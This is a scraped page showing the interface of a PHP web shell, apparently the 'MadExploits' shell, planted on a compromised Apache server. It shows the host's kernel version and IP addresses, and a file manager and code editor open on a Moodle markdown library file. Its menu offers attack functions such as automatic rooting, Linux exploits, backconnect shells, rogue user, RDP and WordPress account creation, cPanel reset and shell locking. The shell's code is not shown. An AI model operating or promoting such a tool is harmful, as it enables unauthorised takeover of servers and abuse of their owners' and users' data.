Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.127.69
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
lib /
markdown /
[ HOME SHELL ]
Name
Size
Permission
Action
License.md
1.6
KB
-rw-r--r--
Markdown.php
49.79
KB
-rw-r--r--
MarkdownExtra.php
50.57
KB
-rw-r--r--
MarkdownInterface.php
898
B
-rw-r--r--
Readme.md
15.46
KB
-rw-r--r--
readme_moodle.txt
819
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : MarkdownInterface.php
<?php /** * Markdown - A text-to-HTML conversion tool for web writers * * @package php-markdown * @author Michel Fortin <michel.fortin@michelf.com> * @copyright 2004-2018 Michel Fortin <https://michelf.com/projects/php-markdown/> * @copyright (Original Markdown) 2004-2006 John Gruber <https://daringfireball.net/projects/markdown/> */ namespace Michelf; /** * Markdown Parser Interface */ interface MarkdownInterface { /** * Initialize the parser and return the result of its transform method. * This will work fine for derived classes too. * * @api * * @param string $text * @return string */ public static function defaultTransform($text); /** * Main function. Performs some preprocessing on the input text * and pass it through the document gamut. * * @api * * @param string $text * @return string */ public function transform($text); }
Close